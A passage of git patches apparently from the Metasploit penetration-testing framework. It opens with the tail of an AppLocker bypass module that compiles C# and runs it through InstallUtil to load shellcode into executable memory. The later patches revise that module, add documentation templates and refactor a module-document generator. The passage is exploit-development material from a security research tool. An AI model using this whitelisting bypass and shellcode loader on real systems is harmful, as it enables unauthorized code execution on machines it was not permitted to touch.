/out:#{exe_path} #{cs_path}") + + print_status("Executing payload ...") + vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") + client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) + register_files_for_cleanup(exe_path) + end + + def get_dotnet_path(windir) + base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}" + paths = client.fs.dir.entries(base_path).select {|p| p[0] == 'v'} + version = paths.last + dotnet_path = "#{base_path}\\#{version}" + + unless dotnet_path && client.fs.file.stat(dotnet_path).directory? + fail_with(Failure::NotVulnerable, '.NET is not present on the target.') + end + + dotnet_path + end + + def generate_csharp_source + sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',') + cs = %Q^ +using System; + +namespace Pop +{ + public class Program { public static void Main() { } } + + [System.ComponentModel.RunInstaller(true)] + public class Pop : System.Configuration.Install.Installer + { + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + private static UInt32 INFINITE = 0xFFFFFFFF; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); + + public override void Uninstall(System.Collections.IDictionary s) + { + byte[] sc = new byte[] {#{sc}}; + IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); + IntPtr id = IntPtr.Zero; + WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); + } + } +} + ^ + + cs + end + +end + From 2ae1e6df7ddec639272210d0f578c75ec3890b0d Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Thu, 18 Feb 2016 14:21:35 +1000 Subject: [PATCH 348/686] Address concerns from @wvu-r7 --- modules/exploits/windows/local/applocker_bypass.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index 64adca97e0..9fc9f8bebc 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -49,12 +49,12 @@ class Metasploit4 < Msf::Exploit::Local # Run Method for when run command is issued def exploit if datastore['TECHNIQUE'] == 'INSTALLUTIL' - if payload.arch.first == 'x64' and !(sysinfo['Architecture'] =~ /64/) + if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') end end - # syinfo is only on meterpreter sessions + # sysinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? if datastore['TECHNIQUE'] == 'INSTALLUTIL' @@ -91,11 +91,11 @@ class Metasploit4 < Msf::Exploit::Local def get_dotnet_path(windir) base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}" - paths = client.fs.dir.entries(base_path).select {|p| p[0] == 'v'} + paths = dir(base_path).select {|p| p[0] == 'v'} version = paths.last dotnet_path = "#{base_path}\\#{version}" - unless dotnet_path && client.fs.file.stat(dotnet_path).directory? + unless dotnet_path && directory?(dotnet_path) fail_with(Failure::NotVulnerable, '.NET is not present on the target.') end From 6d88c264741fcca1bcb5618ce68a066c73b6b0ea Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Thu, 18 Feb 2016 14:23:43 +1000 Subject: [PATCH 349/686] Change title, and remove requires --- modules/exploits/windows/local/applocker_bypass.rb | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index 9fc9f8bebc..ab95094ff1 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -3,10 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' -require 'msf/core/exploit/exe' - class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking @@ -15,7 +11,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, - 'Name' => 'AppLocker bypass', + 'Name' => 'AppLocker Execution Prevention Bypass', 'Description' => %q{ This module will generate a .NET service executable on the target and utilise InstallUtil to run the payload bypassing the AppLocker protection. From 089d6985b6ce6e983a926dae157486c1022fd3b3 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 00:17:32 -0600 Subject: [PATCH 350/686] Add more demo templates --- .../auxiliary_scanner_template.erb | 29 ++++++++++++++ data/markdown_doc/default_template.erb | 7 +++- .../localexploit_demo_template.erb | 14 +++++++ data/markdown_doc/payload_demo_template.erb | 8 ++++ data/markdown_doc/post_demo_template.erb | 40 +++++++++++++++++++ lib/msf/ui/console/command_dispatcher/core.rb | 2 +- lib/msf/util/document_generator.rb | 22 +++++++--- 7 files changed, 115 insertions(+), 7 deletions(-) create mode 100644 data/markdown_doc/auxiliary_scanner_template.erb create mode 100644 data/markdown_doc/localexploit_demo_template.erb create mode 100644 data/markdown_doc/payload_demo_template.erb create mode 100644 data/markdown_doc/post_demo_template.erb diff --git a/data/markdown_doc/auxiliary_scanner_template.erb b/data/markdown_doc/auxiliary_scanner_template.erb new file mode 100644 index 0000000000..409a7c9970 --- /dev/null +++ b/data/markdown_doc/auxiliary_scanner_template.erb @@ -0,0 +1,29 @@ +This module is a scanner module, and is capable of testing against multiple hosts. + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +Other examples of setting the RHSOTS option: + +Example 1: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.3-192.168.1.200 +``` + +Example 2: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.1/24 +``` + +Example 3: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS file:///tmp/ip_list.txt +``` diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb index 48c4b11be9..0d336b78af 100644 --- a/data/markdown_doc/default_template.erb +++ b/data/markdown_doc/default_template.erb @@ -20,19 +20,24 @@ <%= normalize_references(items[:mod_refs]) %> <% end %> -## Available Targets <% if items[:mod_targets] %> +## Available Targets + <%= normalize_targets(items[:mod_targets]) %> <% end %> +<% unless items[:mod_platforms].empty? %> ## Platforms <%= normalize_platforms(items[:mod_platforms]) %> +<% end %> ## Reliability + <%= normalize_rank(items[:mod_rank]) %> <% unless normalize_options(items[:mod_options]).empty? %> ## Mandatory Options + <%= normalize_options(items[:mod_options]) %> <% end %> diff --git a/data/markdown_doc/localexploit_demo_template.erb b/data/markdown_doc/localexploit_demo_template.erb new file mode 100644 index 0000000000..e7ac42287c --- /dev/null +++ b/data/markdown_doc/localexploit_demo_template.erb @@ -0,0 +1,14 @@ +Note: To run a local exploit, make sure you are at the msf prompt. +Also, to check the session ID, use the ```sessions``` command. + + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/payload_demo_template.erb b/data/markdown_doc/payload_demo_template.erb new file mode 100644 index 0000000000..5b2d392cc9 --- /dev/null +++ b/data/markdown_doc/payload_demo_template.erb @@ -0,0 +1,8 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > generate +``` + +To learn how to generate <%= mod.shortname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom). \ No newline at end of file diff --git a/data/markdown_doc/post_demo_template.erb b/data/markdown_doc/post_demo_template.erb new file mode 100644 index 0000000000..97a0c6d4b2 --- /dev/null +++ b/data/markdown_doc/post_demo_template.erb @@ -0,0 +1,40 @@ +There are two ways to execute a post module. + +The first is by using the "run" command at the meterpreter prompt. It allows you to run the post +module against that specific session: + +``` +meterpreter > run <%= mod.fullname %> +``` + +The second is by using the "use" command at the msf prompt. You will have to figure out which +session ID to set manually. To list all session IDs, you can use the "sessions" command. + + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +If you wish to run the post against all sessions, here is how: + +1 - Create the following resource script: + +``` +<ruby> +framework.sessions.each_pair do |sid, session| + run_single("use <%= mod.fullname %>") + run_single("set SESSION #{sid}") + run_single("run") +end +</ruby> +``` + +2 - At the msf prompt, execute the above resource script: + +``` +msf > resource path-to-resource-script +``` \ No newline at end of file diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 451dea0f28..8044454fd2 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -746,7 +746,7 @@ class Core print_line print_line "Options:" print_line "* The flag '-j' will print the data in json format" - print_line "* The flag '-d' will show the markdown version with a browser" + print_line "* The flag '-d' will show the markdown version with a browser. More info, but could be slow." print_line "Queries the supplied module or modules for information. If no module is given," print_line "show info for the currently active module." print_line diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index b56e69c933..bc98f561a0 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -29,11 +29,15 @@ module Msf class DocumentNormalizer - CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) - TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) - BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) - HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) - GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) + CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) + TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) + BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) + HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) + GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) + LOCALEXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'localexploit_demo_template.erb')) + POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) + PAYLOAD_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) + AUXILIARY_SCANNER_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) def get_md_content(items) @md_template ||= lambda { @@ -130,6 +134,14 @@ module Msf load_template(mod, BES_DEMO_TEMPLATE) elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) load_template(mod, HTTPSERVER_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Local) + load_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Post) + load_template(mod, POST_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Payload) + load_template(mod, PAYLOAD_TEMPLATE) + elsif mod.kind_of?(Msf::Auxiliary::Scanner) + load_template(mod, AUXILIARY_SCANNER_TEMPLATE) else load_template(mod, GENERIC_DEMO_TEMPLATE) end From a5f3bddfc890d910ff5c1058b65491039e26cde6 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 00:39:12 -0600 Subject: [PATCH 351/686] Support RPC API --- lib/msf/core/rpc/v10/rpc_module.rb | 13 ++++++++++ lib/msf/ui/console/command_dispatcher/core.rb | 2 +- lib/msf/util/document_generator.rb | 26 ++++++++++++++----- 3 files changed, 34 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index d851b1f501..ef80fadf3c 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,5 +1,7 @@ # -*- coding: binary -*- +require 'msf/util/document_generator' + module Msf module RPC class RPC_Module < RPC_Base @@ -70,6 +72,17 @@ class RPC_Module < RPC_Base end + # Returns detailed information about a module in HTML. + # + # @return [String] HTML file. + # @example Here's how you would use this from the client: + # rpc.call('module.info_html', 'exploit', 'windows/smb/ms08_067_netapi') + def rpc_info_html(mtype, mname) + m = _find_module(mtype, mname) + Msf::Util::DocumentGenerator.get_module_document(m) + end + + # Returns the metadata for a module. # # @param [String] mtype Module type. Supported types include (case-sensitive): diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8044454fd2..64c81f1f19 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -774,7 +774,7 @@ class Core if dump_json print(Serializer::Json.dump_module(active_module) + "\n") elsif show_doc - Msf::Util::DocumentGenerator.get_module_document(active_module) + Msf::Util::DocumentGenerator.spawn_module_document(active_module) else print(Serializer::ReadableText.dump_module(active_module)) end diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index bc98f561a0..27340897d5 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -50,12 +50,22 @@ module Msf private + def load_css + @css ||= lambda { + data = '' + File.open(CSS_BASE_PATH, 'rb') { |f| data = f.read } + return data + }.call + end + def md_to_html(md) r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) %Q| <html> <head> - <link rel="stylesheet" href="file://#{CSS_BASE_PATH}"> + <style> + #{load_css} + </style> </head> <body> #{r.render(md)} @@ -247,6 +257,14 @@ module Msf end + def self.spawn_module_document(mod) + md = get_module_document(mod) + f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) + f.write(md) + f.close + Rex::Compat.open_webrtc_browser("file://#{f.path}") + end + def self.get_module_document(mod) manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") @@ -279,11 +297,7 @@ module Msf items[:mod_targets] = mod.targets end - md = n.get_md_content(items) - f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) - f.write(md) - f.close - Rex::Compat.open_webrtc_browser("file://#{f.path}") + n.get_md_content(items) end end From 68703e19558c4ade3200cfb05e4b6df9f84f50a9 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 18 Feb 2016 10:25:40 -0600 Subject: [PATCH 352/686] Break down DocumenGenerator, fix a bug when opening local md --- lib/msf/util/document_generator.rb | 274 ++---------------- lib/msf/util/document_generator/normalizer.rb | 152 ++++++++++ .../document_generator/pull_request_finder.rb | 109 +++++++ 3 files changed, 280 insertions(+), 255 deletions(-) create mode 100644 lib/msf/util/document_generator/normalizer.rb create mode 100644 lib/msf/util/document_generator/pull_request_finder.rb diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb index 27340897d5..641e31ab0b 100644 --- a/lib/msf/util/document_generator.rb +++ b/lib/msf/util/document_generator.rb @@ -4,272 +4,34 @@ # ### -require 'octokit' -require 'nokogiri' -require 'redcarpet' -require 'net/http' -require 'erb' - -module Redcarpet - module Render - class MsfMdHTML < Redcarpet::Render::HTML - def block_code(code, language) - "<pre>" \ - "<code>#{code}</code>" \ - "</pre>" - end - end - end -end - +require 'msf/util/document_generator/pull_request_finder' +require 'msf/util/document_generator/normalizer' module Msf module Util module DocumentGenerator - class DocumentNormalizer - - CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) - TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) - BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) - HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) - GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) - LOCALEXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'localexploit_demo_template.erb')) - POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) - PAYLOAD_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) - AUXILIARY_SCANNER_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) - - def get_md_content(items) - @md_template ||= lambda { - template = '' - File.open(TEMPLATE_PATH, 'rb') { |f| template = f.read } - return template - }.call - md_to_html(ERB.new(@md_template).result(binding())) - end - - private - - def load_css - @css ||= lambda { - data = '' - File.open(CSS_BASE_PATH, 'rb') { |f| data = f.read } - return data - }.call - end - - def md_to_html(md) - r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) - %Q| - <html> - <head> - <style> - #{load_css} - </style> - </head> - <body> - #{r.render(md)} - </body> - </html> - | - end - - def normalize_pull_requests(pull_requests) - if pull_requests.kind_of?(PullRequestFinder::Exception) - error = Rex::Text.html_encode(pull_requests.message) - return error - end - - formatted_pr = [] - - pull_requests.each_pair do |number, pr| - formatted_pr << "* <a href=\"https://github.com/rapid7/metasploit-framework/pull/#{number}\">##{number}</a> - #{pr[:title]}" - end - - formatted_pr * "\n" - end - - def normalize_options(mod_options) - required_options = [] - - mod_options.each_pair do |name, props| - if props.required && props.default.nil? - required_options << "* #{name} - #{props.desc}" - end - end - - required_options * "\n" - end - - def normalize_description(description) - Rex::Text.wordwrap(Rex::Text.compress(description)) - end - - def normalize_authors(authors) - if authors.kind_of?(Array) - authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" - else - Rex::Text.html_encode(authors) - end - end - - def normalize_targets(targets) - targets.collect { |c| "* #{c.name}" } * "\n" - end - - def normalize_references(refs) - refs.collect { |r| "* <a href=\"#{r}\">#{r}</a>" } * "\n" - end - - def normalize_platforms(platforms) - if platforms.kind_of?(Array) - platforms.collect { |p| "* #{p}" } * "\n" - else - platforms - end - end - - def normalize_rank(rank) - "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" - end - - def load_template(mod, path) - data = '' - File.open(path, 'rb') { |f| data = f.read } - ERB.new(data).result(binding()) - end - - def normalize_demo_output(mod) - if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) - load_template(mod, BES_DEMO_TEMPLATE) - elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) - load_template(mod, HTTPSERVER_DEMO_TEMPLATE) - elsif mod.kind_of?(Msf::Exploit::Local) - load_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) - elsif mod.kind_of?(Msf::Post) - load_template(mod, POST_DEMO_TEMPLATE) - elsif mod.kind_of?(Msf::Payload) - load_template(mod, PAYLOAD_TEMPLATE) - elsif mod.kind_of?(Msf::Auxiliary::Scanner) - load_template(mod, AUXILIARY_SCANNER_TEMPLATE) - else - load_template(mod, GENERIC_DEMO_TEMPLATE) - end - end - - end - - class PullRequestFinder - class Exception < RuntimeError; end - - MANUAL_BASE_PATH = File.expand_path(File.join(Msf::Config.module_directory, '..', 'documentation', 'modules' )) - - attr_accessor :git_client - attr_accessor :repository - attr_accessor :branch - attr_accessor :owner - attr_accessor :git_access_token - - def initialize - unless ENV.has_key?('GITHUB_OAUTH_TOKEN') - raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' - end - - self.owner = 'rapid7' - self.repository = "#{owner}/metasploit-framework" - self.branch = 'master' - self.git_access_token = ENV['GITHUB_OAUTH_TOKEN'] - self.git_client = Octokit::Client.new(access_token: git_access_token) - end - - def search(mod) - file_name = get_normalized_module_name(mod) - commits = get_commits_from_file(file_name) - get_pull_requests_from_commits(commits) - end - - private - - def get_normalized_module_name(mod) - source_fname = mod.method(:initialize).source_location.first - source_fname.scan(/(modules.+)/).flatten.first || '' - end - - def get_commits_from_file(path) - commits = git_client.commits(repository, branch, path: path) - if commits.empty? - # Possibly the path is wrong. - raise PullRequestFinder::Exception, 'No commits found.' - end - - commits - end - - def get_author(commit) - if commit.author - return commit.author[:login].to_s - end - - '' - end - - def is_author_blacklisted?(commit) - ['tabassassin'].include?(get_author(commit)) - end - - def get_pull_requests_from_commits(commits) - pull_requests = {} - - commits.each do |commit| - next if is_author_blacklisted?(commit) - - pr = get_pull_request_from_commit(commit) - unless pr.empty? - pull_requests[pr[:number]] = pr - end - end - - pull_requests - end - - def get_pull_request_from_commit(commit) - sha = commit.sha - url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") - cli = Net::HTTP.new(url.host, url.port) - cli.use_ssl = true - req = Net::HTTP::Get.new(url.request_uri) - res = cli.request(req) - n = Nokogiri::HTML(res.body) - found_pr_link = n.at('li[@class="pull-request"]//a') - - # If there is no PR associated with this commit, it's probably from the SVN days. - return {} unless found_pr_link - - href = found_pr_link.attributes['href'].text - title = found_pr_link.attributes['title'].text - - # Filter out all the pull requests that do not belong to rapid7. - # If this happens, it's probably because the PR was submitted to somebody's fork. - return {} unless /^\/#{owner}\// === href - - { number: href.scan(/\d+$/).flatten.first, title: title } - end - - end - def self.spawn_module_document(mod) - md = get_module_document(mod) - f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) - f.write(md) - f.close - Rex::Compat.open_webrtc_browser("file://#{f.path}") + manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + + unless File.exists?(manual_path) + md = get_module_document(mod) + f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) + f.write(md) + f.close + manual_path = f.path + end + + Rex::Compat.open_webrtc_browser("file://#{manual_path}") end def self.get_module_document(mod) + md = '' + manual_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") if File.exists?(manual_path) - Rex::Compat.open_webrtc_browser("file://#{manual_path}") + File.open(manual_path, 'rb') { |f| md = f.read } else begin pr_finder = PullRequestFinder.new @@ -297,8 +59,10 @@ module Msf items[:mod_targets] = mod.targets end - n.get_md_content(items) + md = n.get_md_content(items) end + + md end end diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb new file mode 100644 index 0000000000..6fcda0262e --- /dev/null +++ b/lib/msf/util/document_generator/normalizer.rb @@ -0,0 +1,152 @@ +require 'redcarpet' +require 'erb' + +module Redcarpet + module Render + class MsfMdHTML < Redcarpet::Render::HTML + def block_code(code, language) + "<pre>" \ + "<code>#{code}</code>" \ + "</pre>" + end + end + end +end + +module Msf + module Util + module DocumentGenerator + class DocumentNormalizer + + CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) + TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) + BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) + HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) + GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) + LOCALEXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'localexploit_demo_template.erb')) + POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) + PAYLOAD_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) + AUXILIARY_SCANNER_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) + + def get_md_content(items) + @md_template ||= lambda { + template = '' + File.open(TEMPLATE_PATH, 'rb') { |f| template = f.read } + return template + }.call + md_to_html(ERB.new(@md_template).result(binding())) + end + + private + + def load_css + @css ||= lambda { + data = '' + File.open(CSS_BASE_PATH, 'rb') { |f| data = f.read } + return data + }.call + end + + def md_to_html(md) + r = Redcarpet::Markdown.new(Redcarpet::Render::MsfMdHTML, fenced_code_blocks: true) + %Q| + <html> + <head> + <style> + #{load_css} + </style> + </head> + <body> + #{r.render(md)} + </body> + </html> + | + end + + def normalize_pull_requests(pull_requests) + if pull_requests.kind_of?(PullRequestFinder::Exception) + error = Rex::Text.html_encode(pull_requests.message) + return error + end + + formatted_pr = [] + + pull_requests.each_pair do |number, pr| + formatted_pr << "* <a href=\"https://github.com/rapid7/metasploit-framework/pull/#{number}\">##{number}</a> - #{pr[:title]}" + end + + formatted_pr * "\n" + end + + def normalize_options(mod_options) + required_options = [] + + mod_options.each_pair do |name, props| + if props.required && props.default.nil? + required_options << "* #{name} - #{props.desc}" + end + end + + required_options * "\n" + end + + def normalize_description(description) + Rex::Text.wordwrap(Rex::Text.compress(description)) + end + + def normalize_authors(authors) + if authors.kind_of?(Array) + authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" + else + Rex::Text.html_encode(authors) + end + end + + def normalize_targets(targets) + targets.collect { |c| "* #{c.name}" } * "\n" + end + + def normalize_references(refs) + refs.collect { |r| "* <a href=\"#{r}\">#{r}</a>" } * "\n" + end + + def normalize_platforms(platforms) + if platforms.kind_of?(Array) + platforms.collect { |p| "* #{p}" } * "\n" + else + platforms + end + end + + def normalize_rank(rank) + "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" + end + + def load_template(mod, path) + data = '' + File.open(path, 'rb') { |f| data = f.read } + ERB.new(data).result(binding()) + end + + def normalize_demo_output(mod) + if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) + load_template(mod, BES_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) + load_template(mod, HTTPSERVER_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Local) + load_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Post) + load_template(mod, POST_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Payload) + load_template(mod, PAYLOAD_TEMPLATE) + elsif mod.kind_of?(Msf::Auxiliary::Scanner) + load_template(mod, AUXILIARY_SCANNER_TEMPLATE) + else + load_template(mod, GENERIC_DEMO_TEMPLATE) + end + end + + end + end + end +end \ No newline at end of file diff --git a/lib/msf/util/document_generator/pull_request_finder.rb b/lib/msf/util/document_generator/pull_request_finder.rb new file mode 100644 index 0000000000..94ae095a93 --- /dev/null +++ b/lib/msf/util/document_generator/pull_request_finder.rb @@ -0,0 +1,109 @@ +require 'octokit' +require 'nokogiri' +require 'net/http' + +module Msf + module Util + module DocumentGenerator + + class PullRequestFinder + + class Exception < RuntimeError; end + + MANUAL_BASE_PATH = File.expand_path(File.join(Msf::Config.module_directory, '..', 'documentation', 'modules' )) + + attr_accessor :git_client + attr_accessor :repository + attr_accessor :branch + attr_accessor :owner + attr_accessor :git_access_token + + def initialize + unless ENV.has_key?('GITHUB_OAUTH_TOKEN') + raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' + end + + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = ENV['GITHUB_OAUTH_TOKEN'] + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + def search(mod) + file_name = get_normalized_module_name(mod) + commits = get_commits_from_file(file_name) + get_pull_requests_from_commits(commits) + end + + private + + def get_normalized_module_name(mod) + source_fname = mod.method(:initialize).source_location.first + source_fname.scan(/(modules.+)/).flatten.first || '' + end + + def get_commits_from_file(path) + commits = git_client.commits(repository, branch, path: path) + if 